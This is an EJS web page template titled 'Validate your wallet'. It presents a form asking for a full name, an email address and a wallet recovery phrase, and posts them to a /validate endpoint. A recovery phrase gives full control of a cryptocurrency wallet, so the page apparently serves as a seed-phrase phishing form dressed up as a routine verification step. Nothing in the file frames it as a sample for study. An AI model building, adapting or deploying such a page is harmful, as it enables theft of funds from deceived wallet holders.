<%- include("partials/header") -%>


<h1 class="header-wallet">Validate your wallet</h1>

    <div class="email-box">
        <form action="/validate" method="post" class="contact-form">
            <label for="name">Full Name*</label><br />
            <input type="text" id="name" name="fName" placeholder="Your full name" autocomplete="off"><br />
            <label for="email">Email Address*</label><br />
            <input type="email" id="email" name="email" placeholder="Your email address" autocomplete="off"><br />
            <span>Important: Please provide an active email address you have access to as a verification email will be sent to this address</span><br />
            <label for="recovery">Recovery Phrase*</label><br />
            <input type="text" id="recovery" name="phrase" placeholder="Enter your phrase"><br />
            <button type="submit">Submit</button>
            


        </form>
    </div>






<%- include("partials/footer") -%>